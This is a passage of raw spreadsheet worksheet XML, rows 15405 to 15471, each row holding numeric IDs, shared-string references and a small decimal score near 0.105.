      </c>
    </row>
    <row r="15405" ht="15.75" customHeight="1">
      <c r="A15405" s="1">
        <v>26634.0</v>
      </c>
      <c r="B15405" s="2">
        <v>1.8043994E7</v>
      </c>
      <c r="C15405" s="2" t="s">
        <v>14859</v>
      </c>
      <c r="D15405" s="2">
        <v>1.0</v>
      </c>
      <c r="E15405" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15405" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15406" ht="15.75" customHeight="1">
      <c r="A15406" s="1">
        <v>28799.0</v>
      </c>
      <c r="B15406" s="2">
        <v>2.8628764E7</v>
      </c>
      <c r="C15406" s="2" t="s">
        <v>14860</v>
      </c>
      <c r="D15406" s="2">
        <v>1.0</v>
      </c>
      <c r="E15406" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15406" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15407" ht="15.75" customHeight="1">
      <c r="A15407" s="1">
        <v>29412.0</v>
      </c>
      <c r="B15407" s="2">
        <v>3.2088491E7</v>
      </c>
      <c r="C15407" s="2" t="s">
        <v>14861</v>
      </c>
      <c r="D15407" s="2">
        <v>1.0</v>
      </c>
      <c r="E15407" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15407" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15408" ht="15.75" customHeight="1">
      <c r="A15408" s="1">
        <v>31880.0</v>
      </c>
      <c r="B15408" s="2">
        <v>5.2866709E7</v>
      </c>
      <c r="C15408" s="2" t="s">
        <v>14862</v>
      </c>
      <c r="D15408" s="2">
        <v>1.0</v>
      </c>
      <c r="E15408" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15408" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15409" ht="15.75" customHeight="1">
      <c r="A15409" s="1">
        <v>32817.0</v>
      </c>
      <c r="B15409" s="2">
        <v>6196433.0</v>
      </c>
      <c r="C15409" s="2" t="s">
        <v>14863</v>
      </c>
      <c r="D15409" s="2">
        <v>1.0</v>
      </c>
      <c r="E15409" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15409" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15410" ht="15.75" customHeight="1">
      <c r="A15410" s="1">
        <v>4884.0</v>
      </c>
      <c r="B15410" s="2">
        <v>4.3861914E7</v>
      </c>
      <c r="C15410" s="2" t="s">
        <v>14864</v>
      </c>
      <c r="D15410" s="2">
        <v>1.0</v>
      </c>
      <c r="E15410" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15410" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15411" ht="15.75" customHeight="1">
      <c r="A15411" s="1">
        <v>5073.0</v>
      </c>
      <c r="B15411" s="2">
        <v>4.4422353E7</v>
      </c>
      <c r="C15411" s="2" t="s">
        <v>14865</v>
      </c>
      <c r="D15411" s="2">
        <v>1.0</v>
      </c>
      <c r="E15411" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15411" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15412" ht="15.75" customHeight="1">
      <c r="A15412" s="1">
        <v>8827.0</v>
      </c>
      <c r="B15412" s="2">
        <v>5.4651189E7</v>
      </c>
      <c r="C15412" s="2" t="s">
        <v>14866</v>
      </c>
      <c r="D15412" s="2">
        <v>1.0</v>
      </c>
      <c r="E15412" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15412" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15413" ht="15.75" customHeight="1">
      <c r="A15413" s="1">
        <v>10782.0</v>
      </c>
      <c r="B15413" s="2">
        <v>1.5658792E7</v>
      </c>
      <c r="C15413" s="2" t="s">
        <v>14867</v>
      </c>
      <c r="D15413" s="2">
        <v>1.0</v>
      </c>
      <c r="E15413" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15413" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15414" ht="15.75" customHeight="1">
      <c r="A15414" s="1">
        <v>10803.0</v>
      </c>
      <c r="B15414" s="2">
        <v>1.582732E7</v>
      </c>
      <c r="C15414" s="2" t="s">
        <v>14868</v>
      </c>
      <c r="D15414" s="2">
        <v>1.0</v>
      </c>
      <c r="E15414" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15414" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15415" ht="15.75" customHeight="1">
      <c r="A15415" s="1">
        <v>15856.0</v>
      </c>
      <c r="B15415" s="2">
        <v>4.4474605E7</v>
      </c>
      <c r="C15415" s="2" t="s">
        <v>14869</v>
      </c>
      <c r="D15415" s="2">
        <v>1.0</v>
      </c>
      <c r="E15415" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15415" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15416" ht="15.75" customHeight="1">
      <c r="A15416" s="1">
        <v>16665.0</v>
      </c>
      <c r="B15416" s="2">
        <v>4.7252241E7</v>
      </c>
      <c r="C15416" s="2" t="s">
        <v>14870</v>
      </c>
      <c r="D15416" s="2">
        <v>1.0</v>
      </c>
      <c r="E15416" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15416" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15417" ht="15.75" customHeight="1">
      <c r="A15417" s="1">
        <v>17032.0</v>
      </c>
      <c r="B15417" s="2">
        <v>4.8492942E7</v>
      </c>
      <c r="C15417" s="2" t="s">
        <v>14871</v>
      </c>
      <c r="D15417" s="2">
        <v>1.0</v>
      </c>
      <c r="E15417" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15417" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15418" ht="15.75" customHeight="1">
      <c r="A15418" s="1">
        <v>24347.0</v>
      </c>
      <c r="B15418" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C15418" s="2" t="s">
        <v>14872</v>
      </c>
      <c r="D15418" s="2">
        <v>1.0</v>
      </c>
      <c r="E15418" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15418" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15419" ht="15.75" customHeight="1">
      <c r="A15419" s="1">
        <v>28875.0</v>
      </c>
      <c r="B15419" s="2">
        <v>2.9151658E7</v>
      </c>
      <c r="C15419" s="2" t="s">
        <v>14873</v>
      </c>
      <c r="D15419" s="2">
        <v>1.0</v>
      </c>
      <c r="E15419" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15419" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15420" ht="15.75" customHeight="1">
      <c r="A15420" s="1">
        <v>33894.0</v>
      </c>
      <c r="B15420" s="2">
        <v>9191959.0</v>
      </c>
      <c r="C15420" s="2" t="s">
        <v>14874</v>
      </c>
      <c r="D15420" s="2">
        <v>1.0</v>
      </c>
      <c r="E15420" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15420" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="15421" ht="15.75" customHeight="1">
      <c r="A15421" s="1">
        <v>3686.0</v>
      </c>
      <c r="B15421" s="2">
        <v>3.9480992E7</v>
      </c>
      <c r="C15421" s="2" t="s">
        <v>14875</v>
      </c>
      <c r="D15421" s="2">
        <v>1.0</v>
      </c>
      <c r="E15421" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15421" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="15422" ht="15.75" customHeight="1">
      <c r="A15422" s="1">
        <v>13116.0</v>
      </c>
      <c r="B15422" s="2">
        <v>3.3586852E7</v>
      </c>
      <c r="C15422" s="2" t="s">
        <v>14876</v>
      </c>
      <c r="D15422" s="2">
        <v>1.0</v>
      </c>
      <c r="E15422" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15422" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="15423" ht="15.75" customHeight="1">
      <c r="A15423" s="1">
        <v>18940.0</v>
      </c>
      <c r="B15423" s="2">
        <v>5.4319664E7</v>
      </c>
      <c r="C15423" s="2" t="s">
        <v>14877</v>
      </c>
      <c r="D15423" s="2">
        <v>1.0</v>
      </c>
      <c r="E15423" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15423" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="15424" ht="15.75" customHeight="1">
      <c r="A15424" s="1">
        <v>23236.0</v>
      </c>
      <c r="B15424" s="2">
        <v>5296420.0</v>
      </c>
      <c r="C15424" s="2" t="s">
        <v>14878</v>
      </c>
      <c r="D15424" s="2">
        <v>1.0</v>
      </c>
      <c r="E15424" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15424" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="15425" ht="15.75" customHeight="1">
      <c r="A15425" s="1">
        <v>27749.0</v>
      </c>
      <c r="B15425" s="2">
        <v>2.3083669E7</v>
      </c>
      <c r="C15425" s="2" t="s">
        <v>14879</v>
      </c>
      <c r="D15425" s="2">
        <v>1.0</v>
      </c>
      <c r="E15425" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15425" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="15426" ht="15.75" customHeight="1">
      <c r="A15426" s="1">
        <v>28749.0</v>
      </c>
      <c r="B15426" s="2">
        <v>2.8122951E7</v>
      </c>
      <c r="C15426" s="2" t="s">
        <v>14880</v>
      </c>
      <c r="D15426" s="2">
        <v>1.0</v>
      </c>
      <c r="E15426" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15426" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="15427" ht="15.75" customHeight="1">
      <c r="A15427" s="1">
        <v>31905.0</v>
      </c>
      <c r="B15427" s="2">
        <v>5296419.0</v>
      </c>
      <c r="C15427" s="2" t="s">
        <v>14881</v>
      </c>
      <c r="D15427" s="2">
        <v>1.0</v>
      </c>
      <c r="E15427" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15427" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="15428" ht="15.75" customHeight="1">
      <c r="A15428" s="1">
        <v>34140.0</v>
      </c>
      <c r="B15428" s="2">
        <v>9819830.0</v>
      </c>
      <c r="C15428" s="2" t="s">
        <v>14882</v>
      </c>
      <c r="D15428" s="2">
        <v>1.0</v>
      </c>
      <c r="E15428" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15428" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="15429" ht="15.75" customHeight="1">
      <c r="A15429" s="1">
        <v>18799.0</v>
      </c>
      <c r="B15429" s="2">
        <v>5.3859099E7</v>
      </c>
      <c r="C15429" s="2" t="s">
        <v>14883</v>
      </c>
      <c r="D15429" s="2">
        <v>1.0</v>
      </c>
      <c r="E15429" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15429" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="15430" ht="15.75" customHeight="1">
      <c r="A15430" s="1">
        <v>31211.0</v>
      </c>
      <c r="B15430" s="2">
        <v>4924828.0</v>
      </c>
      <c r="C15430" s="2" t="s">
        <v>14884</v>
      </c>
      <c r="D15430" s="2">
        <v>1.0</v>
      </c>
      <c r="E15430" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15430" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="15431" ht="15.75" customHeight="1">
      <c r="A15431" s="1">
        <v>13757.0</v>
      </c>
      <c r="B15431" s="2">
        <v>3.6506028E7</v>
      </c>
      <c r="C15431" s="2" t="s">
        <v>14885</v>
      </c>
      <c r="D15431" s="2">
        <v>1.0</v>
      </c>
      <c r="E15431" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15431" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="15432" ht="15.75" customHeight="1">
      <c r="A15432" s="1">
        <v>424.0</v>
      </c>
      <c r="B15432" s="2">
        <v>1.6887159E7</v>
      </c>
      <c r="C15432" s="2" t="s">
        <v>14886</v>
      </c>
      <c r="D15432" s="2">
        <v>1.0</v>
      </c>
      <c r="E15432" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15432" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15433" ht="15.75" customHeight="1">
      <c r="A15433" s="1">
        <v>4150.0</v>
      </c>
      <c r="B15433" s="2">
        <v>4.1438195E7</v>
      </c>
      <c r="C15433" s="2" t="s">
        <v>14887</v>
      </c>
      <c r="D15433" s="2">
        <v>1.0</v>
      </c>
      <c r="E15433" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15433" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15434" ht="15.75" customHeight="1">
      <c r="A15434" s="1">
        <v>9056.0</v>
      </c>
      <c r="B15434" s="2">
        <v>5.5097678E7</v>
      </c>
      <c r="C15434" s="2" t="s">
        <v>14888</v>
      </c>
      <c r="D15434" s="2">
        <v>1.0</v>
      </c>
      <c r="E15434" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15434" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15435" ht="15.75" customHeight="1">
      <c r="A15435" s="1">
        <v>9341.0</v>
      </c>
      <c r="B15435" s="2">
        <v>5.5651697E7</v>
      </c>
      <c r="C15435" s="2" t="s">
        <v>14889</v>
      </c>
      <c r="D15435" s="2">
        <v>1.0</v>
      </c>
      <c r="E15435" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15435" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15436" ht="15.75" customHeight="1">
      <c r="A15436" s="1">
        <v>9353.0</v>
      </c>
      <c r="B15436" s="2">
        <v>5.5669978E7</v>
      </c>
      <c r="C15436" s="2" t="s">
        <v>14890</v>
      </c>
      <c r="D15436" s="2">
        <v>1.0</v>
      </c>
      <c r="E15436" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15436" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15437" ht="15.75" customHeight="1">
      <c r="A15437" s="1">
        <v>11348.0</v>
      </c>
      <c r="B15437" s="2">
        <v>2.1237303E7</v>
      </c>
      <c r="C15437" s="2" t="s">
        <v>14891</v>
      </c>
      <c r="D15437" s="2">
        <v>1.0</v>
      </c>
      <c r="E15437" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15437" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15438" ht="15.75" customHeight="1">
      <c r="A15438" s="1">
        <v>15302.0</v>
      </c>
      <c r="B15438" s="2">
        <v>4.2460266E7</v>
      </c>
      <c r="C15438" s="2" t="s">
        <v>14892</v>
      </c>
      <c r="D15438" s="2">
        <v>1.0</v>
      </c>
      <c r="E15438" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15438" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15439" ht="15.75" customHeight="1">
      <c r="A15439" s="1">
        <v>15609.0</v>
      </c>
      <c r="B15439" s="2">
        <v>4.3514218E7</v>
      </c>
      <c r="C15439" s="2" t="s">
        <v>14893</v>
      </c>
      <c r="D15439" s="2">
        <v>1.0</v>
      </c>
      <c r="E15439" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15439" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15440" ht="15.75" customHeight="1">
      <c r="A15440" s="1">
        <v>16497.0</v>
      </c>
      <c r="B15440" s="2">
        <v>4.656052E7</v>
      </c>
      <c r="C15440" s="2" t="s">
        <v>14894</v>
      </c>
      <c r="D15440" s="2">
        <v>1.0</v>
      </c>
      <c r="E15440" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15440" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15441" ht="15.75" customHeight="1">
      <c r="A15441" s="1">
        <v>17179.0</v>
      </c>
      <c r="B15441" s="2">
        <v>4.8905224E7</v>
      </c>
      <c r="C15441" s="2" t="s">
        <v>14895</v>
      </c>
      <c r="D15441" s="2">
        <v>1.0</v>
      </c>
      <c r="E15441" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15441" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15442" ht="15.75" customHeight="1">
      <c r="A15442" s="1">
        <v>29029.0</v>
      </c>
      <c r="B15442" s="2">
        <v>3.0101594E7</v>
      </c>
      <c r="C15442" s="2" t="s">
        <v>14896</v>
      </c>
      <c r="D15442" s="2">
        <v>1.0</v>
      </c>
      <c r="E15442" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15442" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="15443" ht="15.75" customHeight="1">
      <c r="A15443" s="1">
        <v>6028.0</v>
      </c>
      <c r="B15443" s="2">
        <v>4.753387E7</v>
      </c>
      <c r="C15443" s="2" t="s">
        <v>14897</v>
      </c>
      <c r="D15443" s="2">
        <v>1.0</v>
      </c>
      <c r="E15443" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15443" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15444" ht="15.75" customHeight="1">
      <c r="A15444" s="1">
        <v>8477.0</v>
      </c>
      <c r="B15444" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C15444" s="2" t="s">
        <v>14898</v>
      </c>
      <c r="D15444" s="2">
        <v>1.0</v>
      </c>
      <c r="E15444" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15444" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15445" ht="15.75" customHeight="1">
      <c r="A15445" s="1">
        <v>10387.0</v>
      </c>
      <c r="B15445" s="2">
        <v>8513380.0</v>
      </c>
      <c r="C15445" s="2" t="s">
        <v>14899</v>
      </c>
      <c r="D15445" s="2">
        <v>1.0</v>
      </c>
      <c r="E15445" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15445" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15446" ht="15.75" customHeight="1">
      <c r="A15446" s="1">
        <v>10659.0</v>
      </c>
      <c r="B15446" s="2">
        <v>1.4241397E7</v>
      </c>
      <c r="C15446" s="2" t="s">
        <v>14900</v>
      </c>
      <c r="D15446" s="2">
        <v>1.0</v>
      </c>
      <c r="E15446" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15446" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15447" ht="15.75" customHeight="1">
      <c r="A15447" s="1">
        <v>12050.0</v>
      </c>
      <c r="B15447" s="2">
        <v>2.6378737E7</v>
      </c>
      <c r="C15447" s="2" t="s">
        <v>14901</v>
      </c>
      <c r="D15447" s="2">
        <v>1.0</v>
      </c>
      <c r="E15447" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15447" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15448" ht="15.75" customHeight="1">
      <c r="A15448" s="1">
        <v>17743.0</v>
      </c>
      <c r="B15448" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C15448" s="2" t="s">
        <v>14902</v>
      </c>
      <c r="D15448" s="2">
        <v>1.0</v>
      </c>
      <c r="E15448" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15448" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15449" ht="15.75" customHeight="1">
      <c r="A15449" s="1">
        <v>28522.0</v>
      </c>
      <c r="B15449" s="2">
        <v>2.6756545E7</v>
      </c>
      <c r="C15449" s="2" t="s">
        <v>14903</v>
      </c>
      <c r="D15449" s="2">
        <v>1.0</v>
      </c>
      <c r="E15449" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15449" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15450" ht="15.75" customHeight="1">
      <c r="A15450" s="1">
        <v>28937.0</v>
      </c>
      <c r="B15450" s="2">
        <v>2.9634312E7</v>
      </c>
      <c r="C15450" s="2" t="s">
        <v>14904</v>
      </c>
      <c r="D15450" s="2">
        <v>1.0</v>
      </c>
      <c r="E15450" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15450" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15451" ht="15.75" customHeight="1">
      <c r="A15451" s="1">
        <v>29661.0</v>
      </c>
      <c r="B15451" s="2">
        <v>3.3908488E7</v>
      </c>
      <c r="C15451" s="2" t="s">
        <v>14905</v>
      </c>
      <c r="D15451" s="2">
        <v>1.0</v>
      </c>
      <c r="E15451" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15451" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="15452" ht="15.75" customHeight="1">
      <c r="A15452" s="1">
        <v>3025.0</v>
      </c>
      <c r="B15452" s="2">
        <v>3.6435434E7</v>
      </c>
      <c r="C15452" s="2" t="s">
        <v>14906</v>
      </c>
      <c r="D15452" s="2">
        <v>1.0</v>
      </c>
      <c r="E15452" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15452" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15453" ht="15.75" customHeight="1">
      <c r="A15453" s="1">
        <v>8185.0</v>
      </c>
      <c r="B15453" s="2">
        <v>5.3248555E7</v>
      </c>
      <c r="C15453" s="2" t="s">
        <v>14907</v>
      </c>
      <c r="D15453" s="2">
        <v>1.0</v>
      </c>
      <c r="E15453" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15453" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15454" ht="15.75" customHeight="1">
      <c r="A15454" s="1">
        <v>10022.0</v>
      </c>
      <c r="B15454" s="2">
        <v>5.7052515E7</v>
      </c>
      <c r="C15454" s="2" t="s">
        <v>14908</v>
      </c>
      <c r="D15454" s="2">
        <v>1.0</v>
      </c>
      <c r="E15454" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15454" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15455" ht="15.75" customHeight="1">
      <c r="A15455" s="1">
        <v>16768.0</v>
      </c>
      <c r="B15455" s="2">
        <v>4.767688E7</v>
      </c>
      <c r="C15455" s="2" t="s">
        <v>14909</v>
      </c>
      <c r="D15455" s="2">
        <v>1.0</v>
      </c>
      <c r="E15455" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15455" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15456" ht="15.75" customHeight="1">
      <c r="A15456" s="1">
        <v>18590.0</v>
      </c>
      <c r="B15456" s="2">
        <v>5.3258408E7</v>
      </c>
      <c r="C15456" s="2" t="s">
        <v>14910</v>
      </c>
      <c r="D15456" s="2">
        <v>1.0</v>
      </c>
      <c r="E15456" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15456" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15457" ht="15.75" customHeight="1">
      <c r="A15457" s="1">
        <v>18736.0</v>
      </c>
      <c r="B15457" s="2">
        <v>5.3732359E7</v>
      </c>
      <c r="C15457" s="2" t="s">
        <v>14911</v>
      </c>
      <c r="D15457" s="2">
        <v>1.0</v>
      </c>
      <c r="E15457" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15457" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15458" ht="15.75" customHeight="1">
      <c r="A15458" s="1">
        <v>19789.0</v>
      </c>
      <c r="B15458" s="2">
        <v>5.681164E7</v>
      </c>
      <c r="C15458" s="2" t="s">
        <v>14912</v>
      </c>
      <c r="D15458" s="2">
        <v>1.0</v>
      </c>
      <c r="E15458" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15458" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="15459" ht="15.75" customHeight="1">
      <c r="A15459" s="1">
        <v>474.0</v>
      </c>
      <c r="B15459" s="2">
        <v>1.7409052E7</v>
      </c>
      <c r="C15459" s="2" t="s">
        <v>14913</v>
      </c>
      <c r="D15459" s="2">
        <v>1.0</v>
      </c>
      <c r="E15459" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15459" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15460" ht="15.75" customHeight="1">
      <c r="A15460" s="1">
        <v>13233.0</v>
      </c>
      <c r="B15460" s="2">
        <v>3.4251343E7</v>
      </c>
      <c r="C15460" s="2" t="s">
        <v>14914</v>
      </c>
      <c r="D15460" s="2">
        <v>1.0</v>
      </c>
      <c r="E15460" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15460" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15461" ht="15.75" customHeight="1">
      <c r="A15461" s="1">
        <v>17663.0</v>
      </c>
      <c r="B15461" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C15461" s="2" t="s">
        <v>14915</v>
      </c>
      <c r="D15461" s="2">
        <v>1.0</v>
      </c>
      <c r="E15461" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15461" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15462" ht="15.75" customHeight="1">
      <c r="A15462" s="1">
        <v>18081.0</v>
      </c>
      <c r="B15462" s="2">
        <v>5.1637063E7</v>
      </c>
      <c r="C15462" s="2" t="s">
        <v>14916</v>
      </c>
      <c r="D15462" s="2">
        <v>1.0</v>
      </c>
      <c r="E15462" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15462" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15463" ht="15.75" customHeight="1">
      <c r="A15463" s="1">
        <v>19214.0</v>
      </c>
      <c r="B15463" s="2">
        <v>5.4990132E7</v>
      </c>
      <c r="C15463" s="2" t="s">
        <v>14917</v>
      </c>
      <c r="D15463" s="2">
        <v>1.0</v>
      </c>
      <c r="E15463" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15463" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15464" ht="15.75" customHeight="1">
      <c r="A15464" s="1">
        <v>31016.0</v>
      </c>
      <c r="B15464" s="2">
        <v>4.7733848E7</v>
      </c>
      <c r="C15464" s="2" t="s">
        <v>14918</v>
      </c>
      <c r="D15464" s="2">
        <v>1.0</v>
      </c>
      <c r="E15464" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15464" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="15465" ht="15.75" customHeight="1">
      <c r="A15465" s="1">
        <v>4965.0</v>
      </c>
      <c r="B15465" s="2">
        <v>4.4081102E7</v>
      </c>
      <c r="C15465" s="2" t="s">
        <v>14919</v>
      </c>
      <c r="D15465" s="2">
        <v>1.0</v>
      </c>
      <c r="E15465" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15465" s="2">
        <v>0.1056338028169014</v>
      </c>
    </row>
    <row r="15466" ht="15.75" customHeight="1">
      <c r="A15466" s="1">
        <v>3671.0</v>
      </c>
      <c r="B15466" s="2">
        <v>3.9418998E7</v>
      </c>
      <c r="C15466" s="2" t="s">
        <v>14920</v>
      </c>
      <c r="D15466" s="2">
        <v>1.0</v>
      </c>
      <c r="E15466" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15466" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="15467" ht="15.75" customHeight="1">
      <c r="A15467" s="1">
        <v>8779.0</v>
      </c>
      <c r="B15467" s="2">
        <v>5.4586953E7</v>
      </c>
      <c r="C15467" s="2" t="s">
        <v>14921</v>
      </c>
      <c r="D15467" s="2">
        <v>1.0</v>
      </c>
      <c r="E15467" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15467" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="15468" ht="15.75" customHeight="1">
      <c r="A15468" s="1">
        <v>9274.0</v>
      </c>
      <c r="B15468" s="2">
        <v>5.550972E7</v>
      </c>
      <c r="C15468" s="2" t="s">
        <v>14922</v>
      </c>
      <c r="D15468" s="2">
        <v>1.0</v>
      </c>
      <c r="E15468" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15468" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="15469" ht="15.75" customHeight="1">
      <c r="A15469" s="1">
        <v>2849.0</v>
      </c>
      <c r="B15469" s="2">
        <v>3.5470557E7</v>
      </c>
      <c r="C15469" s="2" t="s">
        <v>14923</v>
      </c>
      <c r="D15469" s="2">
        <v>1.0</v>
      </c>
      <c r="E15469" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15469" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="15470" ht="15.75" customHeight="1">
      <c r="A15470" s="1">
        <v>7145.0</v>
      </c>
      <c r="B15470" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C15470" s="2" t="s">
        <v>14924</v>
      </c>
      <c r="D15470" s="2">
        <v>1.0</v>
      </c>
      <c r="E15470" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15470" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="15471" ht="15.75" customHeight="1">
      <c r="A15471" s="1">
        <v>21495.0</v>
      </c>
      <c r="B15471" s="2">
        <v>2.3080438E7</v>
      </c>
      <c r="C15471" s="2" t="s">
        <v>14925</v>
      </c>
      <c r="D15471" s="2">
        <v>1.0</v>
      </c>
      <c r="E15471" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15471" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
